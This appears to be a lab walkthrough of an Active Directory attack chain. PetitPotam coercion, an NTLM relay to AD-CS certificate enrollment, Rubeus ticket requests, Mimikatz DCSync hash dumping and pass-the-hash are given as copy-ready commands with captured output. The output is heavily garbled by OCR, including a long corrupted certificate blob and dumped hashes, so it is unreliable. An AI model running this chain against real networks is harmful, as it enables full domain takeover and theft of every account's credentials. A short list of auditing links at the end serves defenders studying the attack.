PetitPotam + AD-CS + Rubeus

Summary Of The Attack:

  • Get the DC machine account to connect back to you while you have an NTLM relay set up
  • Use the NTLM relay to connect to the certificate services server to obtain a certificate under the context of the machine account for the DC
  • With a standard domain user use Rubeus to request a TGT using the certificate obtained of the machine account of the DC
  • Dump the hashes using Mimikatz via a DC-Sync attack with the Kerberos ticket imported

Lab Context:

  • 1 AD server am.local (192.168.1.102) – Windows Server 2012 R2 9600
  • 1 AD-CS server (Domain Joined – 192.168.1.30)  – Windows Server 2012 R2 9600
  • Kali Machine (192.168.1.33)
  • Client (192.168.1.104) – Windows 7 SP1 7601

Attacker Machine:

To install the forked version of impacket required for the attack perform the following:

cd /opt

git clone https://github.com/ExAndroidDev/impacket

cd impacket

git switch ntlmrelayx-adcs-attack

python3 -m pip install .

cd /opt

Once installed run the NTLM Relay script using the following command:

ntlmrelayx.py -t http://192.168.1.30/certsrv/certfnsh.asp -smb2support –adcs

Once installed grab a copy of the PetitPotam script from github and run it, setting the relay IP address (to your Kali instance), targeting the DC

git clone https://github.com/topotam/PetitPotam.git

PetitPotam 192.168.1.33 192.168.1.102

rootQka1i:/opt/PetitPotam• python Petitpotam.py 192.168.1.33 192.168.1.1ø2 C) POC [-1 to connect to Isarpc and elicit machine account authentication via MS-EFSRPC EfsRpcOpenFiteRaw() by topotam (atopotam77) Inspired by atifkin_ & Oelad_shamir previous work on MS-RPRN Connecting to Connected! Binding to c681d488-d8sø-11dø-8c52-øøcø4fd9øf7e Successfully bound! Sending EfsRpcOpenFi1eRaw! Got expected exception Attack worked! rootaka1i:/opt/PetitPotamg

If the attack has worked you will see that a CSR has been generated and you’ve got a certificate.

Generating CSR CSR generated! Getting certificate GOT CERTIFICATE! Base64 certificate of user SERVEROI$: "11Q5QIBAzCCEK8GCSqGS1b3DQEHAaCCEKAEghCcM11QmDCCBscGCSqGS1b3DQEHBqCCBrgwggaOAgEAM11GrQY JKoZ1hvcNAQcBMBwGCiqGS1b3DQEMAQMwDgQ199m9TTP8AMYCAggAg11GgDiWd*Y90E9VHyY4mS6kPJD61rZVChKd76 Pi/QXy L3mqV1g71qHusoE8v3qRtpBySy Ls9QwaM18f11bZHU6215zpKxbømoUfrJDzJqg416hOMHK88 1 lc1Wr f2a FAEiKMxYeyYUlP4C2i8zfoCDU3cUzoKxKn356CDqZBFbl+irgY8Ø911x04pM/z+Rveøj jpy2ChAgpSOy9ZeegQjXj1UojfTXHpcX4exWDT4hpjAwSVXv j vz9xX+VtiR++ItpNc F3dpc2 FR+ FUCOyIfhM872fbTHTKojZ36/ SURsqQJDCgdRRJTDDbNzTGs1U88WX2XxuuMeswNGFLw/2CEJnAKX31BQ3GnERTSØNQ1i2ZMi/m1A1xØXnXk1HØFK9RkhXn14nQnh1iWJ6BØVIDX6fOLNX43ZIØTCUdOTe1uSM4kufiNVgE/EfdJDP06xNve1ttørØfL1nECZpgY7DszqPn 3uETxbMIij +0 Jova73RTVU2Yy jX21zu96ZzAsbn8uv4mkRVgx6uCThgDgVWThVSfxaIRqju9qUUørNuWCY2kjUK9XHW25gøy1HuWa FsSUbSxsuSlwLamFCAS2Sc80w1poUhqohe h JDGp LzuB8+zBrztyVjDnM/26d28TMPvyxdc37cZbb7Q211pp8qNEA8Dw7XLCmBPØR1zkuHBKxnYq2/dCROOBmOPxMYxDb5KAvm9zjyd1W3qøqV25L+x+TYZxsSurdRp1f/1d1xMVaTKK/D1mGZbBS+RbbW11brOXEZHpv1/z9ZEQ3g7N8 *Ydbs6a9ri5Cwp la1qHw5Ar LtyBZgfcZH3MqØEj DI LHUODj bVwj6 ITQpc+Xj c40v+hWXDUPLEyDvt3gOVXj UPzmSgP+Mh/9sBxGMmHwzT3ZUOn /m9GfR2NKMM/ EwixzqkOwø LØawGK7e FKvbqUzzrbBghT9yqqiaumor L 2BYGLqrRL++ GiErGfnxvamnEMUrØCcL2XioXEeaFF8M28A7XnxJg3BsuT+hW/1XGn1g6X34LgRa+1RAØMzFJMxw1TMFN5+y9s8POi4Rpøe+-+j3HYf8veLYBjSrZZVLv.x5LZJsvM7gHv1X+zp1H41Z17R/Yd5/Hh1RØ3tdxgPAR2P1bØC2bVpFnJY7vK NtyAuQy FZwbteUc6/3hg5QUiue7XyT7QvSDmBRui1S+bQISsv5HPvGH6rEpT6P1rxmeSRe456WgAAr611Yb214pyBC8+PfkWFoNVHZLRD193NaUTJJ8Gdc9TqmmuSDPZNEki FtdØG7YLJmCLZLXIBv JMHxNeeGigcrZFaF7Su5K/K7HPS+ LØ7dbiIdHZ321 C9xE1sxvØe6V6xmX004W8VutebC+nA5hyb Frwwch+i jqxK7rnSEkhh+LOspip2smCOEg29j2zoqTHoSdbpNChyt ado L Kg+06PZQØMwdNjvrØf/sj4 L j ktwemdmiXøi1r8uobRT1hB4+gM05UirOytyq FGVudmnZøjørXJUgTiiWbXVdjY/ØEHlAL5HUQ7vUxe8Bpt6u21egbCqkQikØ LpI/+HHØS5CKWqwKAyrhVwi"DQUh LXi3YKXNDjZy20FYQxOEpKhr7 jl )jXqURuf1DxwraWj IamQ3C11ZgbmgGiBzsqjNng1 Sc4Ø7 j f4Ar jwR9 /ZCZpf7Sj FWJ7dcDUZVwV5KVDdMpZJom+lJTr5Øokibck3828TcriA9HUdwbMk7 xmStHTmtgm3CQkh L 9PMxBasHOWMLVwøxn7eCi 7 Sn FIh8HmøwTOz8Gi 9VVPjøx zMRsE9/ctXvb81kNp64X3BpmKfZ5kQ9pyRky7R9Ze8eOØ21Dhc2hgj /Yk8JUpTHeb6cNM9gA9BLfZ1zYxn3kmceh13fqs3D4Jkt7kGCw1edvJr6ØTBØ3Th50Hyej9i7PdUUEbdBVOMZY1fLKm70DRwi9b1LYvSttyuFDMOOpowOYPktk7 A5Hj3gLqUG8nY16mJVnsSghaqmSYDcSXhUcHFRSSY30TG3TL1zM11JyQYJKoZ1hvcNAQcB011JugSCCbYwggmyM11JrgYLKoZ1hvcNAQwKAQKggg12M11JcjAcBgoqhkiG9wØBDAEDMA4ECEe+1AStCye LAg11AASCCVDDXSURmCXR38Tr )kjwMdaDxfySf9Hi7FvAØOJoMVSOQRdBRCX20dØ6XRvcZKØDs69DtzwgfX6NJTT13zr jHXDQVvkgp9u61rZSRzAtANE19huPu01MNq SudxDVfrM7 LYtEyaNwhTC7iTuz1/pRbRzczBf+1hWDGtRi/ ZbPcjqKwDjN9dBD03v+Jgcijq3w+CqBxSpZXIOXHJNJSpcLc/90G3fgqKpQ7aDXy2HF11Gc31fjz4tJ08BVeWtepRBXz9k2jQz6AodiDxhMnEMDQxVd6f2wAxSbk1VAVQ+-+ FsgK4jG4/XLELpuALnfQVEYp3WHFrCnQØ4itSp7RKPCB9U /mW6BhHdT4m+je1bj5+ 7weSØloEpt+Øn ImYWHBOfsZh jMBBn F2uuy2K5v7mICEETyQ26aB81gGwGVcKOVRxttdeXgp FfhHpf3dv2nqsTy7 j +8kQy j46sRUnzCtgp4mwcZrGou7ZCfbx5Ckn5zAt FSMtUzbQWquof6 F FtTTMG+qPØf9i50 DDS IbbcfuuQ7s LOnzTvRBRzøwD8E3i fjMmsx9byOVprSzRAlSP2T+zIdRwYpz FPm80T/KØeSDkKpp2T2j 2kEnksGTyVhnd9KDe8PlIBtOGdsBOdbqEf iMVWNq FdXYyxga +Pfpv4i COAYC3geØ3bej 6AeOesIfTJtyxcAepOkTMaQlIBCe KKB3cjnLksgvcD41+ADdg3SDBWhvrwFA+wbK11YTTH1p/9SJE7SSbyTiSYzgvmg7 jrxbPnwmQROcPRHILFLGjUeENEøoew92i1b89S05YMm8WU/xV/ LkSDzUtX6QiVRvWOpxYJBfZDMpfRfv1EE 4 COkrxØ5D7nH1 LtognHØfVqØHZawVgZwSYoOYNBrfRmqaaTNbMVKmeVCg9VfUejcHmuQS7DjPQjøaoJPAea7ibdJRMsX3cuMC6j+øtTstWRcBcBqvyzdWvDthn2ØBWTCGFOcyigTtnkBQ9qWGaBEvdWGiQhPATDySGSL2S6TR2m8bTMi a JWCBXaLbfzOsh2R1tzpawBnwpKN2Y6PYmM96wnez6wPaMi L 45/ j 60yBY42X61VP4cV3cDTMYVg+bybvØ3iP4S9dARGXCbGCpQJDPAMdP91TMQS136QLrbTIDICfQu08P7øiEDgiW7wrpnBpR6YchOgH4pcNMFhW1/4JBIPk6Lz4uSA7x SDS85FKm103820S7utnwoBkzeiJX/AsAMSIUemNDH6FaøuTBN6S11txLDSi/4niØ2CS8Nm09s7CUHwqG/1ZvZQXØ+ycfbCasØKpSnAqMAEWtmLDXtO/TJg+behWrqvn2Z3dmxbAOYsMQhobvOU1cHd1a5e8HhAY5i79zVDØwNiYj6Rbqy 2cSFTLfPKj6b2cA3YW1iidKoBt8s7W/M/9MGNvE6JOKBcøw/C4nbPRx80DZsQQZYEpMYmS4eZ39+bLD/7avEn1ADw11SwJJ3HbEP3goD+WYOKmMKm5vqK5kVR77bRmKymhraPfØØSEqHCcOoZeJ7XuVDkCee4øzrvQGkW8xXEqfAvs7sg HnNQLuopCupoCMM98LsrPlKiww3PSUczr j NN LzK3NYNqSgsHl +DtiHF8aT2C5T/SRqvz8hdGHIzQTi LSD+UIG9hdeYwpuSmlzj3tThewaXeOObNkRpHp15VIx17HXei2Pj xH37ctmlDirvKgMqjrGY12ASh+j03qAffQm9vc9EREiDMjUj blspijir2EVKj 8s04wyq1VxsØh39cxci6 IG+YX7S+SYPh6z+kHHiKt Fq+deWfGAN002tRØYYutsDj 4wOmfønXØULiN7ZFbt4h17 /fBX92U6t LSnDhEGXw1 vIepa6A4XcMs4zMgIXTd4PqzMmOQRnxvMj88z9KpHgCxnvldNhkdvØQjFjE tAnP7iB13tn2Fj /01/gnrhQN2rBJfKDKØTsMOLa+2/3Ew2VoDuMgN8UkaLrxW29ØAtOj1CAexBacH19RK3S3b6Kd5ypqywaw6m9+-+NwtNVEdøa1ø/KqN36Je.oFhLxTH6E5Z+W6d+40WjHn3Sz2RrBByØCIP+1pgZtStam/U+0P9EnS5A NHgYwNIBj iCzNd5fIc/r7k01Qcd/Xa 188NyDFJ/NB/uPdDTiuZbWVR1edqGØdgNvHi IDEStRdfZfSYØKxhgg8DwEwsø/bxdUwfF Lv+SvhiJjwL FtMbNcZkZØJCg61SPIMteBjrlMHTb IVzE7 jrobxØEoZF6gT2g2gQFwi jMf7mQLk7ØjTZ pcccoNTq/C311nDrYARs30aEhoeØ7K6HSQrZaeCB8wpnMOzPcBWr/ jMbSfOCiv7aUdeZNYWYrzrMsZD96ZvSuPdbWDPJIMKLgvODnXJN046tkF/MØ5EEYPZ/FzXi41zxøyDTUPRT41CELnpmJxEw40RHSE78FSqk1r9vWx16XPzr3bYgct aØ85VOt FWMsD1gM2vAMCPtMiøxMN4Cc9cZGGVYITedvvJ8QKS1i LQtJjCzPU3roJh4T72Ba08g22SuewxdzXaTYAgCJ1eKqntxGøoD+60FQAjU8apSOØ5dfwxEIMAenØfC4tytVHtYdF9PD01 jzjafMfoSqp+TthHAbVcYVGWcjzEqBvQWwb FldrOj fvsOosrfrYYrTw4Ø7Wnj6h7teadvRHmkh FXqQh F+ZGWf4049j Dc j IU2db7K+ywp90bplC17nhmoejbt86ØwXu8drz2UdpSH11j F vo iM+ebEvVk3bL3m/gY4UØCHkL4LPseYRRGPHSYbevxcSFkcvUeg48MbSP4tMvxCVWZIOqGZ43AsQNeKb6v13N80AS53dOSqqnEWIUonkYv2RSAsLSMOcmMVviDhØ EWBBS9sSMØ4ihw63dG SzxpMØ4ZqLr+oTAtMCEwCQYFKw4DAhoFAAQUØPqLUMcaAF18P/Xiq+f5nWDwbEØECN+3fmY2gs65

Checking on the PKI server should show the machine account for the DC has certificates issued to it:

certsrv - Certification Authori m-AD-CS-CA Issued Certificates File Action View Help Cemfication Authority (Local) am-AD-CS-CA Revoked Certificates Issued Certificates Pending Requests Failed Requests Certificate T emplates Request ID G] 690 . 722 .4723 724 725 .4726 Requester Name AW,AD-CSS AWA d ministrator AM\user AWSERVEROIS AM\SERVEROIS AWSERVEROIS AM\SERVEROIS m.nSERVER01S AWSERVEROIS AM\SERVEROIS Binary Certificate --8EGIN CERT'... ...BEGIN CERTI... ---BEGIN CERTI... -----8EGIN CERTI... -----BEGIN CERTI... ----BEGIN CERTI... --8EGIN CERT'... - ---BEGINCERTI... - ---BEGINCERTI... -----8EGIN CERTI... Certificate Template CA Exchange (CAExc... User (User) User (User) Computer (Machine) Computer (Machine) Computer (Machine) Computer (Machine) Computer (Machine) Computer (Machine) Computer (Machine) Serial Number 34000002b20b... 3400000002.26... 3400000003597... 3400DD02d1db... 34000002d2a5c... 34000D02d34b... 34000D02d4ac5... 34000002d5633... 34000D02d6cOc... 340DODD2d7905... Certificate Effective Date 27/07/2021 23:11 27/07/2021 22:05 27/07/2021 2206 27/07/2021 23:33 27/07/2021 23:33 27/07/2021 27/07,'2021 23:33 27/07/2021 23:33 27/07/2021 27/07/2021 23:33 Certificate Extir 03/08/2021 23:21 27/07/2022 22:05 27/07/2022 22:06 27/07/2022 23:33 27/07/2022 23:33 27/07/2022 23:33 27/07/202223: 33 27/07/2022 23:33 27/07/2022 23:33 27/07/2022 23:33

Requesting a TGT using Rubes

Install Visual Studio 2019 and compile the Rubes exectuable

(Version 1.6.4 was being used here)

https://github.com/GhostPack/Rubeus

Once compiled perform the following command in order to obtain a Kerberos ticket under the context of the machine account for the DC:

Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt

: NL' seps Nuser\Down 10 ads NRubeus —nas us —mas us le ase >Ruheus . ex askt t 'certificate :N11Q5QIBnzCCEH8GCSqGS1b3DQEHnaCCEKAE hccM1 IQnDCC%scGCS GS1b3DQEHB CCB u aøngEAH1 IGrQYJKoZl RtpBySyjkRg7z yyäKBFbGMiKu ruEkaX 106 QOGHPI pas r +/Kwtb/ugS2qPdwC691 1 • OPoUt1H3HrUQKUdCCäYUUWtFUuLs9Q„aM18f1 1bZHU621SzpKxbønoUfrJDzJqg416hOMHK881 IciUr x04pM/z *RueØjäpy2ChA pSOy9ZeegQJXä1UoJfTXHpcX4exWD14hpJAwSUXuäuz9xX iWJ6BBU d,JD 06xNve1ttØrØfL1nECZ ho idqCwø0•2 g 6iødoQEuuZsgeNY
ul.6.4 Action : Ask TGT Using PKINIT with etype rc4_hmac and subject: CN=SERUEROI Building AS-REQ (w/ PKINIT preauth) for: 'am.10ca1\SERUERß1$' TGI request successful! base64(t icket . kirbi) :
Ticket successfully Service Name Service Re a Im U serNane U serReaIn Start T ine EndT F lags r wardab I e KeyT ype Base64(key) import ed krbtgt / am. local AM.LOCRL SER" EROI $ AM. LOCAL 02/09/2021 03/08/2021 09/08/2021 nane_canonicalize ppe_authent, pc4_hmac reneuable

Executing the command ‘klist’ shows we have a Kerberos ticket under the context of the machine account. From here we can perform a DC-Sync attack using MimiKatz to grab the NTLM hashes of all the domain accounts:

lsadump::dcsync /domain:am.local /all /csv

imikatz tt Isadunp: :dcsync 'domain : an. local / all /csu [DC] ' an. local' will be the domain [DC] 'SERUEW1.an.10ca1' will be the DC server IDC] Exporting domain am. local' trpcJ Service : Idap AuthnSuc : GSS_NEGOTIATE (9) 168 øø 109 i mikatz krbtgt 42fe?W2b3øa8cd781c6933dß748e6d36 9293?94SbS18814341de3F726søød4ff CLIENT 03$ b6dc7bd99W18b9cSeeøa35fd1ßßfß1a CLIENT øl 99?aace2dfbe28eß2d3cbaf44f68423b CLIENT ø2 b82fe4ccfa339caadfea5aa59be4d463 Admin 92937945b5i8814341de3f726Søød4ff 92937945bS18fl14341de3f726Sßßd4ff user AD-CS$ SERUERØI$ 514 66048 66048 4096 4096 4"96 66048 532480

The whole attack in a GIF 😊

We can then use the NTLM hashes obtained from Mimikatz in a PTH attack (requires an elevated terminal)

mimikatz.exe

privilege::debug

sekurlsa::pth /user:am /domain:am.local /ntlm:5c0c009b522xxxxxxxxxxxxxxxxxxxx

net use x: \\SERVER01\c$

dir X:

Command Prompt - net user HSERVERQI icro%0ft WLndow•s [Uer:; Lon 6 -I .7661 1 •opyright (c) 2009 Microsoft Corporation 16:52 17:36 16:39 12:59 All rights reserved. mimikatz 2.20 64 (oe.eo) mimikatz sekurlsa: :pth 'user:am "donain:am. local /ntIm:9293794SbS18814341de3f•,• 26SOOd4ff : NUsepsNuser>net use x he password is invalid ter the user name for : NNSERUERß1Nc$ for user domain pro gran : ers- am . local cmd . exe : 9293794SbSi88i434ide3f726SBØd4ff : PID 6548 TID 3296 LSA Process was already R/" LUID ; 4246774B cøøøØØØøØ:ø288ø19C) nsuI _ø kerberos — data copy @ øøøøøøøøø19E931ø : data copy e øøøøøøøøø1SS9388 aes256_hmac aes128_hnac N_ rc4_md4 *Password replace m imikatz -Y null null OK OK e øøøøøøøøø19CA9S8 OK ! -Y null Administrator: Microsoft Windows [Version 6.1 .76M Copyright (c) 2W9 Nicrosoft Corporation. All rights reserved. C: use x: r he connand completed successfully. Uolune in drive X has no label. Volume Serial Number is D8AS—296ø of 22/08/2013 23/02/2ß21 22/08/2ß13 t6zø3nø21 File(s) 6 Dir(s) 71-795-027 C : Windows ysten32> PerfLogs Program Files Progran Files (x86) s hare W in dows bytes .968 bytes f pee

Congratz, now you own the target network 😊

Auditing:

https://github.com/GhostPack/PSPKIAudit

https://github.com/GhostPack/Certify

https://github.com/GhostPack/ForgeCert

https://posts.specterops.io/certified-pre-owned-d95910965cd2

Resources:

AD CS/PKI template exploit via PetitPotam and NTLMRelayx, from 0 to DomainAdmin in 4 steps
How to setup Microsoft Active Directory Certificate Services [AD CS]

https://twitter.com/wdormann/status/1418576755389083662/photo/4

https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Certified-Pre-Owned-Abusing-Active-Directory-Certificate-Services.pdf

https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf